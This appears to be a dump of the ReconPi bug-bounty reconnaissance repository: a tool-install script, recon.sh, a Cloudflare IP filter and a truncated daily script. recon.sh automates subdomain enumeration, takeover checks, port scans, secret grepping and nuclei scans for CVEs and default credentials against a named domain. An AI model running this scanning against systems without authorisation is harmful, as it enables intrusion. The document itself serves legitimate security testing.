"[$GREEN+$RESET] Done." 121 | 122 | echo -e "[$GREEN+$RESET] Installing meg.." 123 | go get -u -v github.com/tomnomnom/meg 124 | echo -e "[$GREEN+$RESET] Done." 125 | 126 | echo -e "[$GREEN+$RESET] Installing tojson.." 127 | go get -u -v github.com/tomnomnom/hacks/tojson 128 | echo -e "[$GREEN+$RESET] Done." 129 | 130 | echo -e "[$GREEN+$RESET] Installing unfurl.." 131 | go get -u -v github.com/tomnomnom/unfurl 132 | echo -e "[$GREEN+$RESET] Done." 133 | 134 | echo -e "[$GREEN+$RESET] Installing gf.." 135 | go get -u -v github.com/tomnomnom/gf 136 | echo 'source $GOPATH/src/github.com/tomnomnom/gf/gf-completion.bash' >> ~/.bashrc 137 | cp -r $GOPATH/src/github.com/tomnomnom/gf/examples ~/.gf 138 | cd "$HOME"/tools/ || return 139 | git clone https://github.com/1ndianl33t/Gf-Patterns 140 | cp ~/Gf-Patterns/*.json ~/.gf 141 | git clone https://github.com/dwisiswant0/gf-secrets 142 | cp "$HOME"/tools/gf-secrets/.gf/*.json ~/.gf 143 | echo -e "[$GREEN+$RESET] Done." 144 | 145 | echo -e "[$GREEN+$RESET] Installing anew.." 146 | go get -u -v github.com/tomnomnom/anew 147 | echo -e "[$GREEN+$RESET] Done." 148 | 149 | echo -e "[$GREEN+$RESET] Installing qsreplace.." 150 | go get -u -v github.com/tomnomnom/qsreplace 151 | echo -e "[$GREEN+$RESET] Done." 152 | 153 | echo -e "[$GREEN+$RESET] Installing ffuf (Fast web fuzzer).." 154 | go get -u -v github.com/ffuf/ffuf 155 | echo -e "[$GREEN+$RESET] Done." 156 | 157 | echo -e "[$GREEN+$RESET] Installing gobuster.." 158 | go get -u -v github.com/OJ/gobuster 159 | echo -e "[$GREEN+$RESET] Done." 160 | 161 | echo -e "[$GREEN+$RESET] Installing Amass.." 162 | GO111MODULE=on go get -v github.com/OWASP/Amass/v3/... 163 | echo -e "[$GREEN+$RESET] Done." 164 | 165 | echo -e "[$GREEN+$RESET] Installing getJS.." 166 | go get -u -v github.com/003random/getJS 167 | echo -e "[$GREEN+$RESET] Done." 168 | 169 | echo -e "[$GREEN+$RESET] Installing getallURL.." 170 | go get -u -v github.com/lc/gau 171 | echo -e "[$GREEN+$RESET] Done." 172 | 173 | echo -e "[$GREEN+$RESET] Installing shuffledns.." 174 | GO111MODULE=on go get -u -v github.com/projectdiscovery/shuffledns/cmd/shuffledns 175 | echo -e "[$GREEN+$RESET] Done." 176 | 177 | echo -e "[$GREEN+$RESET] Installing dnsprobe.." 178 | GO111MODULE=on go get -u -v github.com/projectdiscovery/dnsprobe 179 | echo -e "[$GREEN+$RESET] Done." 180 | 181 | echo -e "[$GREEN+$RESET] Installing nuclei.." 182 | GO111MODULE=on go get -u -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei 183 | echo -e "[$GREEN+$RESET] Done." 184 | 185 | echo -e "[$GREEN+$RESET] Installing cf-check" 186 | go get -u github.com/dwisiswant0/cf-check 187 | echo -e "[$GREEN+$RESET] Done." 188 | 189 | echo -e "[$GREEN+$RESET] Installing dalfox" 190 | GO111MODULE=on go get -u -v github.com/hahwul/dalfox 191 | echo -e "[$GREEN+$RESET] Done." 192 | 193 | echo -e "[$GREEN+$RESET] Installing hakrawler" 194 | go get -u -v github.com/hakluke/hakrawler 195 | echo -e "[$GREEN+$RESET] Done." 196 | 197 | echo -e "[$GREEN+$RESET] Installing naabu" 198 | GO111MODULE=on go get -u -v github.com/projectdiscovery/naabu/v2/cmd/naabu 199 | echo -e "[$GREEN+$RESET] Done." 200 | 201 | echo -e "[$GREEN+$RESET] Installing chaos" 202 | GO111MODULE=on go get -u github.com/projectdiscovery/chaos-client/cmd/chaos 203 | echo -e "[$GREEN+$RESET] Done." 204 | 205 | echo -e "[$GREEN+$RESET] Installing httpx" 206 | GO111MODULE=on go get -u -v github.com/projectdiscovery/httpx/cmd/httpx 207 | echo -e "[$GREEN+$RESET] Done." 208 | 209 | echo -e "[$GREEN+$RESET] Installing crobat" 210 | go get -u github.com/cgboal/sonarsearch/crobat 211 | echo -e "[$GREEN+$RESET] Done." 212 | 213 | echo -e "[$GREEN+$RESET] Installing slackcat" 214 | go get -u github.com/dwisiswant0/slackcat 215 | echo -e "[$GREEN+$RESET] Done." 216 | 217 | echo -e "[$GREEN+$RESET] Installing github-subdomains" 218 | go get -u github.com/gwen001/github-subdomains 219 | echo -e "[$GREEN+$RESET] Done." 220 | } 221 | 222 | : 'Additional tools' 223 | additionalTools() { 224 | echo -e "[$GREEN+$RESET] Installing massdns.." 225 | if [ -e /usr/local/bin/massdns ]; then 226 | echo -e "[$GREEN+$RESET] Already installed." 227 | else 228 | cd "$HOME"/tools/ || return 229 | git clone https://github.com/blechschmidt/massdns.git 230 | cd "$HOME"/tools/massdns || return 231 | echo -e "[$GREEN+$RESET] Running make command for massdns.." 232 | make -j 233 | sudo cp "$HOME"/tools/massdns/bin/massdns /usr/local/bin/ 234 | echo -e "[$GREEN+$RESET] Done." 235 | fi 236 | 237 | echo -e "[$GREEN+$RESET] Installing nuclei-templates.." 238 | nuclei -update-templates 239 | echo -e "[$GREEN+$RESET] Done." 240 | 241 | echo -e "[$GREEN+$RESET] Installing jq.." 242 | sudo apt install -y jq 243 | echo -e "[$GREEN+$RESET] Done." 244 | 245 | echo -e "[$GREEN+$RESET] Installing Chromium browser.." 246 | sudo apt install -y chromium-browser 247 | echo -e "[$GREEN+$RESET] Done." 248 | 249 | echo -e "[$GREEN+$RESET] Installing masscan.." 250 | if [ -e /usr/local/bin/masscan ]; then 251 | echo -e "[$GREEN+$RESET] Already installed." 252 | else 253 | cd "$HOME"/tools/ || return 254 | git clone https://github.com/robertdavidgraham/masscan 255 | cd "$HOME"/tools/masscan || return 256 | make -j 257 | sudo cp bin/masscan /usr/local/bin/masscan 258 | sudo apt install libpcap-dev -y 259 | cd "$HOME"/tools/ || return 260 | echo -e "[$GREEN+$RESET] Done." 261 | fi 262 | 263 | echo -e "[$GREEN+$RESET] Installing Corsy (CORS Misconfiguration Scanner).." 264 | if [ -e "$HOME"/tools/Corsy/corsy.py ]; then 265 | echo -e "[$GREEN+$RESET] Already installed." 266 | else 267 | cd "$HOME"/tools/ || return 268 | git clone https://github.com/s0md3v/Corsy.git 269 | cd "$HOME"/tools/Corsy || return 270 | sudo pip3 install -r requirements.txt 271 | cd "$HOME"/tools/ || return 272 | echo -e "[$GREEN+$RESET] Done." 273 | fi 274 | 275 | echo -e "[$GREEN+$RESET] Installing dirsearch.." 276 | if [ -e "$HOME"/tools/dirsearch/dirsearch.py ]; then 277 | echo -e "[$GREEN+$RESET] Already installed." 278 | else 279 | cd "$HOME"/tools/ || return 280 | git clone https://github.com/maurosoria/dirsearch.git 281 | cd "$HOME"/tools/ || return 282 | echo -e "[$GREEN+$RESET] Done." 283 | fi 284 | 285 | echo -e "[$GREEN+$RESET] Installing Arjun (HTTP parameter discovery suite).." 286 | if [ -e "$HOME"/tools/Arjun/arjun.py ]; then 287 | echo -e "[$GREEN+$RESET] Already installed." 288 | else 289 | cd "$HOME"/tools/ || return 290 | git clone https://github.com/s0md3v/Arjun.git 291 | echo -e "[$GREEN+$RESET] Done." 292 | fi 293 | 294 | echo -e "[$GREEN+$RESET] Installing Dnsgen .." 295 | if [ -e "$HOME"/tools/dnsgen/setup.py ]; then 296 | echo -e "[$GREEN+$RESET] Already installed." 297 | else 298 | cd "$HOME"/tools/ || return 299 | git clone https://github.com/ProjectAnte/dnsgen 300 | cd "$HOME"/tools/dnsgen || return 301 | pip3 install -r requirements.txt --user 302 | sudo python3 setup.py install 303 | echo -e "[$GREEN+$RESET] Done." 304 | fi 305 | 306 | echo -e "[$GREEN+$RESET] Installing sublert.." 307 | if [ -e "$HOME"/tools/sublert/sublert.py ]; then 308 | echo -e "[$GREEN+$RESET] Already installed." 309 | else 310 | cd "$HOME"/tools/ || return 311 | git clone https://github.com/yassineaboukir/sublert.git 312 | cd "$HOME"/tools/sublert || return 313 | sudo apt-get install -y libpq-dev dnspython psycopg2 tld termcolor 314 | pip3 install -r requirements.txt --user 315 | echo -e "[$GREEN+$RESET] Done." 316 | fi 317 | 318 | echo -e "[$GREEN+$RESET] Installing findomain.." 319 | arch=`uname -m` 320 | if [ -e "$HOME"/tools/findomain ]; then 321 | echo -e "[$GREEN+$RESET] Already installed." 322 | elif [[ "$arch" == "x86_64" ]]; then 323 | wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux -O "$HOME"/tools/findomain 324 | chmod +x "$HOME"/tools/findomain 325 | sudo cp "$HOME"/tools/findomain /usr/local/bin 326 | echo -e "[$GREEN+$RESET] Done." 327 | else 328 | wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-aarch64 -O "$HOME"/tools/findomain 329 | chmod +x "$HOME"/tools/findomain 330 | sudo cp "$HOME"/tools/findomain /usr/local/bin 331 | echo -e "[$GREEN+$RESET] Done." 332 | fi 333 | 334 | echo -e "[$GREEN+$RESET] Installing LinkFinder.." 335 | # needs check 336 | if [ -e "$HOME"/tools/LinkFinder/linkfinder.py ]; then 337 | echo -e "[$GREEN+$RESET] Already installed." 338 | else 339 | cd "$HOME"/tools/ || return 340 | git clone https://github.com/GerbenJavado/LinkFinder.git 341 | cd "$HOME"/tools/LinkFinder || return 342 | pip3 install -r requirements.txt --user 343 | sudo python3 setup.py install 344 | echo -e "[$GREEN+$RESET] Done." 345 | fi 346 | 347 | echo -e "[$GREEN+$RESET] Installing bass.." 348 | # needs check 349 | if [ -e "$HOME"/tools/bass/bass.py ]; then 350 | echo -e "[$GREEN+$RESET] Already installed." 351 | else 352 | cd "$HOME"/tools/ || return 353 | git clone https://github.com/Abss0x7tbh/bass.git 354 | cd "$HOME"/tools/bass || return 355 | sudo pip3 install tldextract 356 | pip3 install -r requirements.txt --user 357 | echo -e "[$GREEN+$RESET] Done." 358 | fi 359 | 360 | echo -e "[$GREEN+$RESET] Installing interlace.." 361 | if [ -e /usr/local/bin/interlace ]; then 362 | echo -e "[$GREEN+$RESET] Already installed." 363 | else 364 | cd "$HOME"/tools/ || return 365 | git clone https://github.com/codingo/Interlace.git 366 | cd "$HOME"/tools/Interlace || return 367 | sudo python3 setup.py install 368 | echo -e "[$GREEN+$RESET] Done." 369 | fi 370 | 371 | echo -e "[$GREEN+$RESET] Installing nmap.." 372 | sudo apt-get install -y nmap 373 | wget https://raw.githubusercontent.com/vulnersCom/nmap-vulners/master/vulners.nse -O /usr/share/nmap/scripts/vulners.nse && nmap --script-updatedb 374 | echo -e "[$GREEN+$RESET] Done." 375 | 376 | echo -e "[$GREEN+$RESET] Installing SecLists.." 377 | if [ -e "$HOME"/tools/Seclists/Discovery ]; then 378 | echo -e "[$GREEN+$RESET] Already installed." 379 | else 380 | cd "$HOME"/tools/ || return 381 | git clone https://github.com/danielmiessler/SecLists.git 382 | echo -e "[$GREEN+$RESET] Done." 383 | fi 384 | 385 | echo -e "[$GREEN+$RESET] Installing Altdns.." 386 | pip install py-altdns 387 | echo -e "[$GREEN+$RESET] Done." 388 | 389 | echo -e "[$GREEN+$RESET] Installing Eyewitness.." 390 | cd "$HOME"/tools/ || return 391 | git clone https://github.com/FortyNorthSecurity/EyeWitness.git 392 | sudo bash "$HOME"/tools/EyeWitness/Python/setup/setup.sh 393 | echo -e "[$GREEN+$RESET] Done." 394 | 395 | echo -e "[$GREEN+$RESET] Installing Discord.py.." 396 | sudo python3 -m pip install -U discord.py 397 | echo -e "[$GREEN+$RESET] Done." 398 | } 399 | 400 | : 'Dashboard setup' 401 | setupDashboard() { 402 | echo -e "[$GREEN+$RESET] Installing Nginx.." 403 | sudo apt-get install -y nginx 404 | sudo nginx -t 405 | echo -e "[$GREEN+$RESET] Done." 406 | } 407 | 408 | : 'Finalize' 409 | finalizeSetup() { 410 | echo -e "[$GREEN+$RESET] Finishing up.." 411 | displayLogo 412 | source "$HOME"/.bashrc || return 413 | echo -e "[$GREEN+$RESET] Installation script finished! " 414 | } 415 | 416 | : 'Execute the main functions' 417 | displayLogo 418 | basicRequirements 419 | golangInstall 420 | golangTools 421 | additionalTools 422 | setupDashboard 423 | finalizeSetup 424 | -------------------------------------------------------------------------------- /recon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | : ' 3 | @name ReconPi recon.sh 4 | @author Martijn B 5 | @link https://github.com/x1mdev/ReconPi 6 | ' 7 | 8 | : 'Set the main variables' 9 | YELLOW="\033[1;33m" 10 | GREEN="\033[0;32m" 11 | RESET="\033[0m" 12 | domain="$1" 13 | RESULTDIR="$HOME/assets/$domain" 14 | WORDLIST="$RESULTDIR/wordlists" 15 | SCREENSHOTS="$RESULTDIR/screenshots" 16 | SUBS="$RESULTDIR/subdomains" 17 | DIRSCAN="$RESULTDIR/directories" 18 | HTML="$RESULTDIR/html" 19 | GFSCAN="$RESULTDIR/gfscan" 20 | IPS="$RESULTDIR/ips" 21 | PORTSCAN="$RESULTDIR/portscan" 22 | ARCHIVE="$RESULTDIR/archive" 23 | VERSION="2.2" 24 | NUCLEISCAN="$RESULTDIR/nucleiscan" 25 | 26 | 27 | : 'Display the logo' 28 | displayLogo() { 29 | echo -e " 30 | __________ __________.__ 31 | \______ \ ____ ____ ____ ____\______ \__| 32 | | _// __ \_/ ___\/ _ \ / \| ___/ | 33 | | | \ ___/\ \__( <_> ) | \ | | | 34 | |____|_ /\___ >\___ >____/|___| /____| |__| 35 | \/ \/ \/ \/ 36 | 37 | v$VERSION - $YELLOW@x1m_martijn$RESET" 38 | } 39 | 40 | : 'Display help text when no arguments are given' 41 | checkArguments() { 42 | if [[ -z $domain ]]; then 43 | echo -e "[$GREEN+$RESET] Usage: recon " 44 | exit 1 45 | fi 46 | } 47 | 48 | checkDirectories() { 49 | echo -e "[$GREEN+$RESET] Creating directories and grabbing wordlists for $GREEN$domain$RESET.." 50 | mkdir -p "$RESULTDIR" 51 | mkdir -p "$SUBS" "$SCREENSHOTS" "$DIRSCAN" "$HTML" "$WORDLIST" "$IPS" "$PORTSCAN" "$ARCHIVE" "$NUCLEISCAN" "$GFSCAN" 52 | } 53 | 54 | startFunction() { 55 | tool=$1 56 | echo -e "[$GREEN+$RESET] Starting $tool" 57 | } 58 | 59 | : 'Gather resolvers' 60 | gatherResolvers() { 61 | startFunction "Get fresh working resolvers" 62 | wget https://raw.githubusercontent.com/janmasarik/resolvers/master/resolvers.txt -O "$IPS"/resolvers.txt 63 | } 64 | 65 | : 'subdomain gathering' 66 | gatherSubdomains() { 67 | startFunction "sublert" 68 | echo -e "[$GREEN+$RESET] Checking for existing sublert output, otherwise add it." 69 | if [ ! -e "$SUBS"/sublert.txt ]; then 70 | cd "$HOME"/tools/sublert || return 71 | yes | python3 sublert.py -u "$domain" 72 | cp "$HOME"/tools/sublert/output/"$domain".txt "$SUBS"/sublert.txt 73 | cd "$HOME" || return 74 | else 75 | cp "$HOME"/tools/sublert/output/"$domain".txt "$SUBS"/sublert.txt 76 | fi 77 | echo -e "[$GREEN+$RESET] Done, next." 78 | 79 | startFunction "subfinder" 80 | "$HOME"/go/bin/subfinder -d "$domain" -all -config "$HOME"/ReconPi/configs/config.yaml -o "$SUBS"/subfinder.txt 81 | echo -e "[$GREEN+$RESET] Done, next." 82 | 83 | startFunction "assetfinder" 84 | "$HOME"/go/bin/assetfinder --subs-only "$domain" >"$SUBS"/assetfinder.txt 85 | echo -e "[$GREEN+$RESET] Done, next." 86 | 87 | startFunction "amass" 88 | "$HOME"/go/bin/amass enum -passive -d "$domain" -config "$HOME"/ReconPi/configs/config.ini -o "$SUBS"/amassp.txt 89 | echo -e "[$GREEN+$RESET] Done, next." 90 | 91 | startFunction "findomain" 92 | findomain -t "$domain" -u "$SUBS"/findomain_subdomains.txt 93 | echo -e "[$GREEN+$RESET] Done, next." 94 | 95 | startFunction "chaos" 96 | chaos -d "$domain" -key $CHAOS_KEY -o "$SUBS"/chaos_data.txt 97 | echo -e "[$GREEN+$RESET] Done, next." 98 | 99 | startFunction "github-subdomains" 100 | github-subdomains -t $github_subdomains_token -d "$domain" | sort -u >> "$SUBS"/github_subdomains.txt 101 | echo -e "[$GREEN+$RESET] Done, next." 102 | 103 | startFunction rapiddns 104 | crobat -s "$domain" | sort -u | tee "$SUBS"/rapiddns_subdomains.txt 105 | echo -e "[$GREEN+$RESET] Done, next." 106 | 107 | echo -e "[$GREEN+$RESET] Combining and sorting results.." 108 | cat "$SUBS"/*.txt | sort -u >"$SUBS"/subdomains 109 | echo -e "[$GREEN+$RESET] Resolving subdomains.." 110 | cat "$SUBS"/subdomains | sort -u | shuffledns -silent -d "$domain" -r "$IPS"/resolvers.txt > "$SUBS"/alive_subdomains 111 | echo -e "[$GREEN+$RESET] Getting alive hosts.." 112 | cat "$SUBS"/alive_subdomains | "$HOME"/go/bin/httprobe -prefer-https | tee "$SUBS"/hosts 113 | echo -e "[$GREEN+$RESET] Done." 114 | } 115 | 116 | : 'subdomain takeover check' 117 | checkTakeovers() { 118 | startFunction "subjack" 119 | "$HOME"/go/bin/subjack -w "$SUBS"/hosts -a -ssl -t 50 -v -c "$HOME"/go/src/github.com/haccer/subjack/fingerprints.json -o "$SUBS"/all-takeover-checks.txt -ssl 120 | grep -v "Not Vulnerable" <"$SUBS"/all-takeover-checks.txt >"$SUBS"/takeovers 121 | rm "$SUBS"/all-takeover-checks.txt 122 | 123 | vulnto=$(cat "$SUBS"/takeovers) 124 | if [[ $vulnto == *i* ]]; then 125 | echo -e "[$GREEN+$RESET] Possible subdomain takeovers:" 126 | for line in "$SUBS"/takeovers; do 127 | echo -e "[$GREEN+$RESET] --> $vulnto " 128 | done 129 | else 130 | echo -e "[$GREEN+$RESET] No takeovers found." 131 | fi 132 | 133 | startFunction "nuclei to check takeover" 134 | cat "$SUBS"/hosts | nuclei -t subdomain-takeover/ -c 50 -o "$SUBS"/nuclei-takeover-checks.txt 135 | vulnto=$(cat "$SUBS"/nuclei-takeover-checks.txt) 136 | if [[ $vulnto != "" ]]; then 137 | echo -e "[$GREEN+$RESET] Possible subdomain takeovers:" 138 | for line in "$SUBS"/nuclei-takeover-checks.txt; do 139 | echo -e "[$GREEN+$RESET] --> $vulnto " 140 | done 141 | else 142 | echo -e "[$GREEN+$RESET] No takeovers found." 143 | fi 144 | } 145 | 146 | : 'Get all CNAME' 147 | getCNAME() { 148 | startFunction "dnsprobe to get CNAMEs" 149 | cat "$SUBS"/subdomains | dnsprobe -r CNAME -o "$SUBS"/subdomains_cname.txt 150 | } 151 | 152 | : 'Gather IPs with dnsprobe' 153 | gatherIPs() { 154 | startFunction "dnsprobe" 155 | cat "$SUBS"/subdomains | dnsprobe -silent -f ip | sort -u | tee "$IPS"/"$domain"-ips.txt 156 | python3 $HOME/ReconPi/scripts/clean_ips.py "$IPS"/"$domain"-ips.txt "$IPS"/"$domain"-origin-ips.txt 157 | echo -e "[$GREEN+$RESET] Done." 158 | } 159 | 160 | : 'Portscan on found IP addresses' 161 | portScan() { 162 | startFunction "Port Scan" 163 | cat "$SUBS"/alive_subdomains | naabu -p - -silent -no-probe -exclude-cdn -nmap -config "$HOME"/ReconPi/configs/naabu.conf 164 | mv reconpi-nmap* "$PORTSCAN" 165 | echo -e "[$GREEN+$RESET] Port Scan finished" 166 | } 167 | 168 | : 'Use eyewitness to gather screenshots' 169 | gatherScreenshots() { 170 | startFunction "Screenshot Gathering" 171 | # Bug in aquatone, once it gets fixed, will enable aquatone on x86 also. 172 | arch=`uname -m` 173 | if [[ "$arch" == "x86_64" ]]; then 174 | python3 $HOME/tools/EyeWitness/Python/EyeWitness.py -f "$SUBS"/hosts --no-prompt -d "$SCREENSHOTS" 175 | else 176 | "$HOME"/go/bin/aquatone -http-timeout 10000 -out "$SCREENSHOTS" <"$SUBS"/hosts 177 | fi 178 | echo -e "[$GREEN+$RESET] Screenshot Gathering finished" 179 | } 180 | 181 | fetchArchive() { 182 | startFunction "fetchArchive" 183 | cat "$SUBS"/hosts | sed 's/https\?:\/\///' | gau > "$ARCHIVE"/getallurls.txt 184 | cat "$ARCHIVE"/getallurls.txt | sort -u | unfurl --unique keys > "$ARCHIVE"/paramlist.txt 185 | cat "$ARCHIVE"/getallurls.txt | sort -u | grep -P "\w+\.js(\?|$)" | httpx -silent -status-code -mc 200 | awk '{print $1}' | sort -u > "$ARCHIVE"/jsurls.txt 186 | cat "$ARCHIVE"/getallurls.txt | sort -u | grep -P "\w+\.php(\?|$) | httpx -silent -status-code -mc 200 | awk '{print $1}' | sort -u " > "$ARCHIVE"/phpurls.txt 187 | cat "$ARCHIVE"/getallurls.txt | sort -u | grep -P "\w+\.aspx(\?|$) | httpx -silent -status-code -mc 200 | awk '{print $1}' | sort -u " > "$ARCHIVE"/aspxurls.txt 188 | cat "$ARCHIVE"/getallurls.txt | sort -u | grep -P "\w+\.jsp(\?|$) | httpx -silent -status-code -mc 200 | awk '{print $1}' | sort -u " > "$ARCHIVE"/jspurls.txt 189 | echo -e "[$GREEN+$RESET] fetchArchive finished" 190 | } 191 | 192 | fetchEndpoints() { 193 | startFunction "fetchEndpoints" 194 | for js in `cat "$ARCHIVE"/jsurls.txt`; 195 | do 196 | python3 "$HOME"/tools/LinkFinder/linkfinder.py -i $js -o cli | anew "$ARCHIVE"/endpoints.txt; 197 | done 198 | echo -e "[$GREEN+$RESET] fetchEndpoints finished" 199 | } 200 | : 'Gather information with meg' 201 | startMeg() { 202 | startFunction "meg" 203 | cd "$SUBS" || return 204 | meg -d 1000 -v / 205 | mv out meg 206 | cd "$HOME" || return 207 | } 208 | 209 | : 'Use gf to find secrets in responses' 210 | startGfScan() { 211 | startFunction "Checking for secrets using gf" 212 | cd "$SUBS"/meg || return 213 | for i in `gf -list`; do [[ ${i} =~ "_secrets"* ]] && gf ${i} >> "$GFSCAN"/"${i}".txt; done 214 | cd "$HOME" || return 215 | } 216 | 217 | : 'directory brute-force' 218 | startBruteForce() { 219 | startFunction "directory brute-force" 220 | # maybe run with interlace? Might remove 221 | cat "$SUBS"/hosts | parallel -j 5 --bar --shuf gobuster dir -u {} -t 50 -w wordlist.txt -l -e -r -k -q -o "$DIRSCAN"/"$sub".txt 222 | "$HOME"/go/bin/gobuster dir -u "$line" -w "$WORDLIST"/wordlist.txt -e -q -k -n -o "$DIRSCAN"/out.txt 223 | } 224 | : 'Check for Vulnerabilities' 225 | runNuclei() { 226 | startFunction "Nuclei Basic-detections" 227 | nuclei -l "$SUBS"/hosts -t generic-detections/ -c 50 -H "x-bug-bounty: $hackerhandle" -o "$NUCLEISCAN"/generic-detections.txt 228 | startFunction "Nuclei CVEs Detection" 229 | nuclei -l "$SUBS"/hosts -t cves/ -c 50 -H "x-bug-bounty: $hackerhandle" -o "$NUCLEISCAN"/cve.txt 230 | startFunction "Nuclei default-creds Check" 231 | nuclei -l "$SUBS"/hosts -t default-credentials/ -c 50 -H "x-bug-bounty: $hackerhandle" -o "$NUCLEISCAN"/default-creds.txt 232 | startFunction "Nuclei dns check" 233 | nuclei -l "$SUBS"/hosts -t dns/ -c 50 -H "x-bug-bounty: $hackerhandle" -o "$NUCLEISCAN"/dns.txt 234 | startFunction "Nuclei files check" 235 | nuclei -l "$SUBS"/hosts -t files/ -c 50 -H "x-bug-bounty: $hackerhandle" -o "$NUCLEISCAN"/files.txt 236 | startFunction "Nuclei Panels Check" 237 | nuclei -l "$SUBS"/hosts -t panels/ -c 50 -H "x-bug-bounty: $hackerhandle" -o "$NUCLEISCAN"/panels.txt 238 | startFunction "Nuclei Security-misconfiguration Check" 239 | nuclei -l "$SUBS"/hosts -t security-misconfiguration/ -c 50 -H "x-bug-bounty: $hackerhandle" -o "$NUCLEISCAN"/security-misconfiguration.txt 240 | startFunction "Nuclei Technologies Check" 241 | nuclei -l "$SUBS"/hosts -t technologies/ -c 50 -H "x-bug-bounty: $hackerhandle" -o "$NUCLEISCAN"/technologies.txt 242 | startFunction "Nuclei Tokens Check" 243 | nuclei -l "$SUBS"/hosts -t tokens/ -c 50 -H "x-bug-bounty: $hackerhandle" -o "$NUCLEISCAN"/tokens.txt 244 | startFunction "Nuclei Vulnerabilties Check" 245 | nuclei -l "$SUBS"/hosts -t vulnerabilities/ -c 50 -H "x-bug-bounty: $hackerhandle" -o "$NUCLEISCAN"/vulnerabilties.txt 246 | echo -e "[$GREEN+$RESET] Nuclei Scan finished" 247 | } 248 | 249 | : 'Setup screenshot results on the target IP address' 250 | makePage() { 251 | startFunction "HTML webpage" 252 | cd /var/www/html/ || return 253 | sudo chmod -R 755 . 254 | sudo cp -r "$SCREENSHOTS" /var/www/html/$domain 255 | sudo chmod a+r -R /var/www/html/$domain/* 256 | cd "$HOME" || return 257 | echo -e "[$GREEN+$RESET] Scan finished, start doing some manual work ;)" 258 | echo -e "[$GREEN+$RESET] The screenshot results page, nuclei results directory and the meg results directory are great points!" 259 | echo -e "[$GREEN+$RESET] screenshot results page: http://$(ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | head -n 1)/$domain/screenshots/report.html" 260 | } 261 | 262 | notifySlack() { 263 | startFunction "Trigger Slack Notification" 264 | source "$HOME"/ReconPi/configs/tokens.txt 265 | export SLACK_WEBHOOK_URL="$SLACK_WEBHOOK_URL" 266 | echo -e "ReconPi $domain scan completed!" | slackcat 267 | totalsum=$(cat $SUBS/hosts | wc -l) 268 | echo -e "$totalsum live subdomain hosts discovered" | slackcat 269 | 270 | posibbletko="$(cat $SUBS/takeovers | wc -l)" 271 | if [ -s "$SUBS/takeovers" ] 272 | then 273 | echo -e "Found $posibbletko possible subdomain takeovers." | slackcat 274 | else 275 | echo "No subdomain takeovers found." | slackcat 276 | fi 277 | 278 | if [ -f "$NUCLEISCAN/cve.txt" ]; then 279 | echo "CVE's discovered:" | slackcat 280 | cat "$NUCLEISCAN/cve.txt" | slackcat 281 | else 282 | echo -e "No CVE's discovered." | slackcat 283 | fi 284 | 285 | if [ -f "$NUCLEISCAN/files.txt" ]; then 286 | echo "files discovered:" | slackcat 287 | cat "$NUCLEISCAN/files.txt" | slackcat 288 | else 289 | echo -e "No files discovered." | slackcat 290 | fi 291 | 292 | echo -e "[$GREEN+$RESET] Done." 293 | } 294 | 295 | notifyDiscord() { 296 | startFunction "Trigger Discord Notification" 297 | intfiles=$(cat $NUCLEISCAN/*.txt | wc -l) 298 | 299 | source "$HOME"/ReconPi/configs/tokens.txt 300 | export DISCORD_WEBHOOK_URL="$DISCORD_WEBHOOK_URL" 301 | 302 | totalsum=$(cat $SUBS/hosts | wc -l) 303 | message="**$domain scan completed!\n $totalsum live hosts discovered.**\n" 304 | 305 | if [ -s "$SUBS/takeovers" ] 306 | then 307 | posibbletko="$(cat $SUBS/takeovers | wc -l)" 308 | message+="**Found $posibbletko possible subdomain takeovers.**\n" 309 | else 310 | message+="**No subdomain takovers found.**\n" 311 | fi 312 | 313 | cd $NUCLEISCAN 314 | for file in *.txt 315 | do 316 | if [ -s "$file" ] 317 | then 318 | fileName=$(basename ${file%%.*}) 319 | fileNameUpper="$(tr '[:lower:]' '[:upper:]' <<< ${fileName:0:1})${fileName:1}" 320 | nucleiData="$(jq -Rs . <$file | cut -c 2- | rev | cut -c 2- | rev)" 321 | message+="**$fileNameUpper discovered:**\n "$nucleiData"\n" 322 | fi 323 | done 324 | 325 | python3 $HOME/ReconPi/scripts/webhook_Discord.py <<< $(echo "$message") 326 | 327 | echo -e "[$GREEN+$RESET] Done." 328 | } 329 | 330 | : 'Execute the main functions' 331 | 332 | source "$HOME"/ReconPi/configs/tokens.txt || return 333 | export SLACK_WEBHOOK_URL="$SLACK_WEBHOOK_URL" 334 | 335 | displayLogo 336 | checkArguments 337 | checkDirectories 338 | gatherResolvers 339 | gatherSubdomains 340 | checkTakeovers 341 | getCNAME 342 | gatherIPs 343 | gatherScreenshots 344 | startMeg 345 | #fetchArchive 346 | #fetchEndpoints 347 | startGfScan 348 | runNuclei 349 | portScan 350 | #makePage 351 | notifySlack 352 | notifyDiscord 353 | 354 | # Uncomment the functions 355 | -------------------------------------------------------------------------------- /scripts/clean_ips.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | from ipaddress import ip_network, ip_address 4 | 5 | def output_valid_ips(ips): 6 | ipvs4 = "https://www.cloudflare.com/ips-v4" 7 | ipvs6 = "https://www.cloudflare.com/ips-v6" 8 | 9 | ipranges = requests.get(ipvs4).text.split("\n")[:-1] # removing last trailing space 10 | ipranges += requests.get(ipvs6).text.split("\n")[ 11 | :-1 12 | ] # removing last trailing space 13 | nets = [] 14 | for iprange in ipranges: 15 | nets.append(ip_network(iprange)) 16 | valid_ips = [] 17 | for ip in ips: 18 | if ip == "": # skip empty line 19 | continue 20 | valid = True 21 | for net in nets: 22 | if ip_address(ip) in net: 23 | valid = False 24 | break 25 | if valid: 26 | valid_ips.append(ip) 27 | return valid_ips 28 | 29 | 30 | if __name__ == "__main__": 31 | if len(sys.argv) < 3: 32 | print( 33 | """ 34 | Usage : python {} input_file_path output_file_path 35 | """.format( 36 | __file__ 37 | ) 38 | ) 39 | sys.exit(1) 40 | file_name, output_file = sys.argv[1], sys.argv[2] 41 | 42 | with open(file_name) as f: 43 | ips = f.read().split("\n") 44 | valid_ips = output_valid_ips(ips) 45 | 46 | with open(output_file, "w") as f: 47 | for ip in valid_ips[:-1]: 48 | f.write(ip + "\n") 49 | # no new line after last line 50 | f.write(valid_ips[-1]) 51 | -------------------------------------------------------------------------------- /scripts/daily: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | wget https://raw.githubusercontent.com/BBerastegui/fresh-dns-servers/master/resolvers.txt -O $HOME/assets/$1/ips/resolvers.txt 4 | 5 | amass enum 